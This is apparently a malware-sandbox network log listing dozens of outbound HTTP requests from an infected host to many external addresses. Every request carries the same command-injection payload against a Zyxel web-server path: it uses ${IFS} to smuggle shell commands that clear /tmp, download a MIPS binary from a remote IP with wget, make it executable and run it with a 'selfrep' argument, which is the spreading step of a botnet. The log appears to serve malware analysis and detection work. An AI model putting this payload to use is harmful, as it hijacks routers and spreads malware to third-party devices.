                                                  Jan 19, 2024 18:24:08.308419943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7484192.168.2.1338120216.103.157.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308444977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7485192.168.2.1355672115.115.173.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308494091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7486192.168.2.134741447.112.87.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308532000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7487192.168.2.1356236102.231.40.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308592081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7488192.168.2.133559442.123.46.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308619976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7489192.168.2.1349146116.84.106.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308657885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7490192.168.2.1356378119.30.185.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308700085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7491192.168.2.135727868.66.218.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308727026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7492192.168.2.1344560212.115.71.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308789015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7493192.168.2.1337584155.95.42.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308830023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7494192.168.2.1338318155.152.217.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308878899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7495192.168.2.135228481.24.123.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308902025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7496192.168.2.1354684205.81.177.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308959007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7497192.168.2.135574463.30.85.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.308985949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7498192.168.2.1344086113.108.232.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309012890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7499192.168.2.1346970201.217.254.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309072971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7500192.168.2.1356444199.145.118.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309114933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7501192.168.2.1358042155.58.198.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309153080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7502192.168.2.1333786159.18.96.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309185982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7503192.168.2.1348610213.84.18.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309237003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7504192.168.2.1334294143.13.65.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309262037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7505192.168.2.1343738149.101.254.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309326887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7506192.168.2.1347972209.176.64.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309348106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7507192.168.2.1354174191.127.91.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309402943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7508192.168.2.1348352115.131.98.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309432030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7509192.168.2.1334564190.104.15.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309465885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7510192.168.2.1354492221.70.185.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309493065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7511192.168.2.1360206176.0.213.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309530973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7512192.168.2.1336634221.48.21.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309576035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7513192.168.2.133850481.93.163.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309614897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7514192.168.2.13391509.51.164.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309672117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7515192.168.2.135502443.99.26.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309724092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7516192.168.2.1343370159.19.53.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309755087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7517192.168.2.135568246.175.138.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309806108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7518192.168.2.1339392220.253.3.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309833050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7519192.168.2.134206483.108.110.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309871912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7520192.168.2.1348470129.3.50.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309933901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7521192.168.2.135514873.229.24.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.309972048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7522192.168.2.1338368143.247.40.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310003042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7523192.168.2.134316089.96.4.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310041904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7524192.168.2.1341896113.169.70.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310091972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7525192.168.2.1347622167.122.87.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310139894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7526192.168.2.1348810184.241.159.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310205936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7527192.168.2.134464093.236.96.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310230017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7528192.168.2.1340236154.176.131.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310261965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7529192.168.2.134578284.99.252.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310309887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7530192.168.2.135956439.172.120.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310353994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7531192.168.2.1345156172.68.170.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310374022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7532192.168.2.1342336165.114.149.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310434103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7533192.168.2.135808844.156.235.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310446024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7534192.168.2.1353416126.252.240.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310506105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7535192.168.2.134414819.182.3.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310547113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7536192.168.2.13380549.252.94.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310564995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7537192.168.2.1341526114.41.169.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310616016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7538192.168.2.1344260106.114.78.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310633898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7539192.168.2.1358108121.120.142.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310672045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7540192.168.2.1342020148.15.196.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310718060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7541192.168.2.1357422166.239.241.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310770035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7542192.168.2.1349808223.255.204.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310791016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7543192.168.2.134448074.74.4.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310847998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7544192.168.2.134918813.144.245.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310894966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7545192.168.2.134944498.157.127.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:08.310926914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7546192.168.2.13577785.74.196.103443
                                                  TimestampBytes transferredDirectionData
